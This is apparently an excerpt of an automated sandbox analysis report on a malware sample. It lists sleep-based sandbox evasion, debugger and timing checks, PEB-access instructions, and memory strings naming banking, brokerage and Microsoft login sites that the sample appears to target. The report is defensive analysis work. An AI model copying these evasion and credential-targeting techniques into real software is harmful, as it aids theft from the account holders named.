                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe TID: 2704Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe TID: 1416Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 4852Thread sleep count: 147 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 4852Thread sleep time: -294000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 4852Thread sleep count: 9824 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exe TID: 4852Thread sleep time: -19648000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Inquiry files v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 023115.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 023115.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 023115.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 023115.16.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 023115.16.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: WOzeoJQi.exe, 00000009.00000002.2513134857.0000000006C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:W
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.office.comVMware20,116
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swordVMware20,11
                Source: 023115.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,(|4
                Source: 023115.16.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 023115.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 023115.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 023115.16.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 023115.16.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,116
                Source: 023115.16.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374212695.000000000159E000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3030632235.000001B8D2DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 023115.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 023115.16.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 023115.16.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 023115.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 023115.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696
                Source: WOzeoJQi.exe, 00000009.00000002.2513062532.0000000006BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 023115.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 023115.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 023115.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 023115.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 023115.16.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 023115.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .co.inVMware20,1
                Source: 023115.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 023115.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 023115.16.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re.comVMware20,1
                Source: 023115.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20
                Source: 023115.16.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 023115.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 023115.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 023115.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F096E rdtsc 7_2_012F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00417953 LdrLoadDll,7_2_00417953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E0124 mov eax, dword ptr fs:[00000030h]7_2_012E0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01370115 mov eax, dword ptr fs:[00000030h]7_2_01370115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135A118 mov ecx, dword ptr fs:[00000030h]7_2_0135A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135A118 mov eax, dword ptr fs:[00000030h]7_2_0135A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135A118 mov eax, dword ptr fs:[00000030h]7_2_0135A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135A118 mov eax, dword ptr fs:[00000030h]7_2_0135A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h]7_2_0135E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384164 mov eax, dword ptr fs:[00000030h]7_2_01384164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384164 mov eax, dword ptr fs:[00000030h]7_2_01384164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01348158 mov eax, dword ptr fs:[00000030h]7_2_01348158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01344144 mov eax, dword ptr fs:[00000030h]7_2_01344144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01344144 mov eax, dword ptr fs:[00000030h]7_2_01344144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01344144 mov ecx, dword ptr fs:[00000030h]7_2_01344144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01344144 mov eax, dword ptr fs:[00000030h]7_2_01344144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01344144 mov eax, dword ptr fs:[00000030h]7_2_01344144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AC156 mov eax, dword ptr fs:[00000030h]7_2_012AC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6154 mov eax, dword ptr fs:[00000030h]7_2_012B6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6154 mov eax, dword ptr fs:[00000030h]7_2_012B6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F0185 mov eax, dword ptr fs:[00000030h]7_2_012F0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133019F mov eax, dword ptr fs:[00000030h]7_2_0133019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133019F mov eax, dword ptr fs:[00000030h]7_2_0133019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133019F mov eax, dword ptr fs:[00000030h]7_2_0133019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133019F mov eax, dword ptr fs:[00000030h]7_2_0133019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01354180 mov eax, dword ptr fs:[00000030h]7_2_01354180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01354180 mov eax, dword ptr fs:[00000030h]7_2_01354180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AA197 mov eax, dword ptr fs:[00000030h]7_2_012AA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AA197 mov eax, dword ptr fs:[00000030h]7_2_012AA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AA197 mov eax, dword ptr fs:[00000030h]7_2_012AA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136C188 mov eax, dword ptr fs:[00000030h]7_2_0136C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136C188 mov eax, dword ptr fs:[00000030h]7_2_0136C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E01F8 mov eax, dword ptr fs:[00000030h]7_2_012E01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013861E5 mov eax, dword ptr fs:[00000030h]7_2_013861E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E1D0 mov eax, dword ptr fs:[00000030h]7_2_0132E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E1D0 mov eax, dword ptr fs:[00000030h]7_2_0132E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E1D0 mov ecx, dword ptr fs:[00000030h]7_2_0132E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E1D0 mov eax, dword ptr fs:[00000030h]7_2_0132E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E1D0 mov eax, dword ptr fs:[00000030h]7_2_0132E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013761C3 mov eax, dword ptr fs:[00000030h]7_2_013761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013761C3 mov eax, dword ptr fs:[00000030h]7_2_013761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01346030 mov eax, dword ptr fs:[00000030h]7_2_01346030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AA020 mov eax, dword ptr fs:[00000030h]7_2_012AA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AC020 mov eax, dword ptr fs:[00000030h]7_2_012AC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01334000 mov ecx, dword ptr fs:[00000030h]7_2_01334000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01352000 mov eax, dword ptr fs:[00000030h]7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE016 mov eax, dword ptr fs:[00000030h]7_2_012CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE016 mov eax, dword ptr fs:[00000030h]7_2_012CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE016 mov eax, dword ptr fs:[00000030h]7_2_012CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE016 mov eax, dword ptr fs:[00000030h]7_2_012CE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DC073 mov eax, dword ptr fs:[00000030h]7_2_012DC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01336050 mov eax, dword ptr fs:[00000030h]7_2_01336050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B2050 mov eax, dword ptr fs:[00000030h]7_2_012B2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A80A0 mov eax, dword ptr fs:[00000030h]7_2_012A80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013760B8 mov eax, dword ptr fs:[00000030h]7_2_013760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013760B8 mov ecx, dword ptr fs:[00000030h]7_2_013760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013480A8 mov eax, dword ptr fs:[00000030h]7_2_013480A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B208A mov eax, dword ptr fs:[00000030h]7_2_012B208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B80E9 mov eax, dword ptr fs:[00000030h]7_2_012B80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AA0E3 mov ecx, dword ptr fs:[00000030h]7_2_012AA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013360E0 mov eax, dword ptr fs:[00000030h]7_2_013360E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AC0F0 mov eax, dword ptr fs:[00000030h]7_2_012AC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F20F0 mov ecx, dword ptr fs:[00000030h]7_2_012F20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013320DE mov eax, dword ptr fs:[00000030h]7_2_013320DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01388324 mov eax, dword ptr fs:[00000030h]7_2_01388324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01388324 mov ecx, dword ptr fs:[00000030h]7_2_01388324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01388324 mov eax, dword ptr fs:[00000030h]7_2_01388324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01388324 mov eax, dword ptr fs:[00000030h]7_2_01388324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA30B mov eax, dword ptr fs:[00000030h]7_2_012EA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA30B mov eax, dword ptr fs:[00000030h]7_2_012EA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA30B mov eax, dword ptr fs:[00000030h]7_2_012EA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AC310 mov ecx, dword ptr fs:[00000030h]7_2_012AC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D0310 mov ecx, dword ptr fs:[00000030h]7_2_012D0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135437C mov eax, dword ptr fs:[00000030h]7_2_0135437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137A352 mov eax, dword ptr fs:[00000030h]7_2_0137A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01358350 mov ecx, dword ptr fs:[00000030h]7_2_01358350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133035C mov eax, dword ptr fs:[00000030h]7_2_0133035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133035C mov eax, dword ptr fs:[00000030h]7_2_0133035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133035C mov eax, dword ptr fs:[00000030h]7_2_0133035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133035C mov ecx, dword ptr fs:[00000030h]7_2_0133035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133035C mov eax, dword ptr fs:[00000030h]7_2_0133035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133035C mov eax, dword ptr fs:[00000030h]7_2_0133035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0138634F mov eax, dword ptr fs:[00000030h]7_2_0138634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE388 mov eax, dword ptr fs:[00000030h]7_2_012AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE388 mov eax, dword ptr fs:[00000030h]7_2_012AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE388 mov eax, dword ptr fs:[00000030h]7_2_012AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D438F mov eax, dword ptr fs:[00000030h]7_2_012D438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D438F mov eax, dword ptr fs:[00000030h]7_2_012D438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8397 mov eax, dword ptr fs:[00000030h]7_2_012A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8397 mov eax, dword ptr fs:[00000030h]7_2_012A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8397 mov eax, dword ptr fs:[00000030h]7_2_012A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E63FF mov eax, dword ptr fs:[00000030h]7_2_012E63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE3F0 mov eax, dword ptr fs:[00000030h]7_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE3F0 mov eax, dword ptr fs:[00000030h]7_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE3F0 mov eax, dword ptr fs:[00000030h]7_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013543D4 mov eax, dword ptr fs:[00000030h]7_2_013543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013543D4 mov eax, dword ptr fs:[00000030h]7_2_013543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
